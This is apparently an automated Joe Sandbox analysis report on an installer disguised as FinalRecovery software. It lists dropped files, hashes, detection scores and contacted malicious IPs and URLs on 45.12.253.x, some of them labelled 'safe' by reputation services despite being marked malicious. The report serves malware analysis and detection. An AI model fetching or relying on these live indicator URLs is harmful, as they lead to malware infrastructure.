Sample-level nodes: 45.12.253.98 CMCSUS Germany; Snort IDS alert for network traffic; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 3 other signatures
file.exe 2 (started)
  dropped: C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32
  signature: Obfuscated command line found
  file.tmp 18 16 (started)
    dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
    dropped: C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32
    dropped: C:\Users\user\AppData\Local\...\_RegDLL.tmp, PE32
    dropped: 6 other files (5 malicious)
    finalrecovery.exe 24 (started)
      network: 45.12.253.56, 49701, 80 CMCSUS Germany
      network: 45.12.253.72, 49702, 80 CMCSUS Germany
      network: 45.12.253.75, 49703, 80 CMCSUS Germany
      dropped: C:\Users\user\AppData\Roaming\...\wEQg8.exe, PE32
      wEQg8.exe (started)
        signature: Multi AV Scanner detection for dropped file
      cmd.exe 1 (started)
        taskkill.exe 1 (started)
        conhost.exe (started)

              No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-J1RPT.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_RegDLL.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp | 2% | ReversingLabs | |
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe | 60% | ReversingLabs | Win32.Trojan.GenusAgent |
Source | Detection | Scanner | Label | Link | Download
1.2.file.tmp.400000.0.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
2.2.finalrecovery.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1250671 | | Download File
0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Dropper.Gen | | Download File
0.3.file.exe.23c75c8.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
1.0.file.tmp.4b375c.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
0.3.file.exe.21db608.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
1.2.file.tmp.4b375c.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.innosetup.com/ | 0% | URL Reputation | safe |
http://45.12.253.72/default/stuk.php | 0% | URL Reputation | safe |
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte | 0% | URL Reputation | safe |
http://www.remobjects.com/psU | 0% | URL Reputation | safe |
http://45.12.253.72/default/puk.php | 0% | URL Reputation | safe |
http://45.12.253.75/dll.php | 0% | URL Reputation | safe |
http://www.finalrecovery.com/buy.htm | 0% | URL Reputation | safe |
http://www.remobjects.com/ps | 0% | URL Reputation | safe |
http://45.12.253.75/dll.phpd | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpc | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpK | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpL | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpi | 0% | Avira URL Cloud | safe |
http://45.12 | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpQ | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phprl | 0% | Avira URL Cloud | safe |
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteY | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpr | 0% | Avira URL Cloud | safe |
http://nbafrog.com/ | 0% | Avira URL Cloud | safe |
http://nbafrog.com/. | 0% | Avira URL Cloud | safe |
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteeF | 0% | Avira URL Cloud | safe |
http://45.12.253.72/default/stuk.php2N | 0% | Avira URL Cloud | safe |
http://45.12.253.75/dll.phpx | 0% | Avira URL Cloud | safe |
              No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://45.12.253.72/default/stuk.php | true | URL Reputation: safe | unknown
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte | true | URL Reputation: safe | unknown
http://45.12.253.72/default/puk.php | true | URL Reputation: safe | unknown
http://45.12.253.75/dll.php | true | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://45.12.253.75/dll.phpc | finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.innosetup.com/ | file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr | false | URL Reputation: safe | unknown
http://45.12.253.75/dll.phpd | finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/psU | file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr | false | URL Reputation: safe | unknown
http://45.12.253.75/dll.phpK | finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.75/dll.phpL | finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12 | finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://45.12.253.75/dll.phpi | finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.75/dll.phpQ | finalrecovery.exe, 00000002.00000003.317221588.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.311035551.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.75/dll.phprl | finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.finalrecovery.com/buy.htm | is-6R8AD.tmp.1.dr | false | URL Reputation: safe | unknown
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteY | finalrecovery.exe, 00000002.00000002.322403889.0000000001746000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.75/dll.phpr | finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.274580019.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | file.exe, 00000000.00000003.241822498.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241621215.0000000002320000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.242237851.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-H9OSH.tmp.1.dr, file.tmp.0.dr | false | URL Reputation: safe | unknown
http://nbafrog.com/ | file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nbafrog.com/. | file.exe, 00000000.00000003.324486104.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.241488665.0000000002131000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.242648810.00000000022D8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.323445536.00000000022C7000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinteeF | finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.72/default/stuk.php2N | finalrecovery.exe, 00000002.00000002.322403889.0000000001771000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://45.12.253.75/dll.phpx | finalrecovery.exe, 00000002.00000003.262404075.000000000179B000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.304961528.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.280683373.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.268319049.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.292827662.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.298815858.000000000179D000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000003.286801187.000000000179D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.12.253.72 | unknown | Germany | | 33657 | CMCSUS | true
45.12.253.75 | unknown | Germany | | 33657 | CMCSUS | true
45.12.253.98 | unknown | Germany | | 33657 | CMCSUS | true
45.12.253.56 | unknown | Germany | | 33657 | CMCSUS | true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 791306
Start date and time: 2023-01-25 10:16:08 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 56s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: file.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.evad.winEXE@12/24@0/4
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 38.4% (good quality ratio 37.3%)
• Quality average: 81.3%
• Quality standard deviation: 24.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 8.248.113.254, 8.238.190.126, 67.26.139.254, 8.248.139.254, 67.26.137.254, 93.184.221.240
• Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
Time | Type | Description
10:17:04 | API Interceptor | 1x Sleep call for process: wEQg8.exe modified
              No context
Process: C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 791040
Entropy (8bit): 6.608982798504157
Encrypted: false
SSDEEP: 24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
MD5: 5C2FE7D4DDE65810152054F3C93C1815
SHA1: 2A19F3FAA78A5072068F7902DB19A248F11FA69B
SHA-256: 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
SHA-512: 2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: moderate, very likely benign file
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1949
              Entropy (8bit):4.915453283427292
              Encrypted:false
              SSDEEP:48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
              MD5:C0AE85DB30FE9027DBBF3BA758FA78BE
              SHA1:95E69DB95504A9F61D090690F32FB5D2F685C604
              SHA-256:CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
              SHA-512:DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
              Category:dropped
              Size (bytes):6452
              Entropy (8bit):4.734154041089812
              Encrypted:false
              SSDEEP:96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
              MD5:247D3A0C3B0C53CA33D032A561619495
              SHA1:F30570C48749FE427FACCBDF925048B149D22460
              SHA-256:783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
              SHA-512:9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
              Category:dropped
              Size (bytes):6452
              Entropy (8bit):4.734154041089812
              Encrypted:false
              SSDEEP:96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
              MD5:247D3A0C3B0C53CA33D032A561619495
              SHA1:F30570C48749FE427FACCBDF925048B149D22460
              SHA-256:783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
              SHA-512:9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:MS Windows HtmlHelp Data
              Category:dropped
              Size (bytes):553405
              Entropy (8bit):7.979175020825392
              Encrypted:false
              SSDEEP:12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
              MD5:37E6EEA8C4E469F6439F3790166815DD
              SHA1:E0A3768F291CC7FCE178A001F0356D4FBA29D81F
              SHA-256:606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
              SHA-512:68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
              Malicious:false
              Preview:ITSF....`.......&..u.......|.{.......".....|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Category:modified
              Size (bytes):1327101
              Entropy (8bit):6.5808664941884
              Encrypted:false
              SSDEEP:24576:ao3RaJaXyPGnMQO9hLCbg5bm/GAiiXWDwpz2n60uKACK7p33r3L++fNlol:toECPpvj6GAQwzKqG
              MD5:04947B1020E31A5F5A6E41FD279B4E74
              SHA1:815B42143F71CC7FFD1943E9E1971F9ABEA82BF0
              SHA-256:2F220AEDF9ADF351EDCC62CD2917E1590C8DA932D3BCCE276AC082B3DEBCFF8C
              SHA-512:CE8D691F9BF52ECFF8C26CAC3D3D444E2ADB01DAAF32138923B1E6E7D0CCE373F060A1F719808A35852FE70AB7AB8670F91C3B7775A9B3754323521FD4BEBD7C
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:data
              Category:dropped
              Size (bytes):1327101
              Entropy (8bit):6.58086621775031
              Encrypted:false
              SSDEEP:24576:fo3RaJaXyPGnMQO9hLCbg5bm/GAiiXWDwpz2n60uKACK7p33r3L++fNlol:6oECPpvj6GAQwzKqG
              MD5:05C8159B5028CE14F3DE0C2F38D01DED
              SHA1:0C0FAEE09CE3F28530A56955611422902D1F101C
              SHA-256:57B1E1B366C667078FE2E1203900E7E139A1AAB0704654D9906B5A1C4C15EB4C
              SHA-512:2680B3AE8B5986ACC9F9548094799F27EC120CE00C89CF2A624F73423630D397F7D7F20A3BCF013A0E45FF8A2B8A672E2414426B1DDAC8B94A3D8BCCC92CFDF0
              Malicious:false
              Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1949
              Entropy (8bit):4.915453283427292
              Encrypted:false
              SSDEEP:48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
              MD5:C0AE85DB30FE9027DBBF3BA758FA78BE
              SHA1:95E69DB95504A9F61D090690F32FB5D2F685C604
              SHA-256:CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
              SHA-512:DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
              Malicious:false
              Preview:.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):723230
              Entropy (8bit):6.49191904892708
              Encrypted:false
              SSDEEP:12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
              MD5:D0E4493CD1CEC1B97F24BAB12A942543
              SHA1:CEE352F43F982FCB36A337D2C15FFDD28B04B80D
              SHA-256:C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
              SHA-512:D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
              Malicious:true
              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:MS Windows HtmlHelp Data
              Category:dropped
              Size (bytes):553405
              Entropy (8bit):7.979175020825392
              Encrypted:false
              SSDEEP:12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
              MD5:37E6EEA8C4E469F6439F3790166815DD
              SHA1:E0A3768F291CC7FCE178A001F0356D4FBA29D81F
              SHA-256:606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
              SHA-512:68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
              Malicious:false
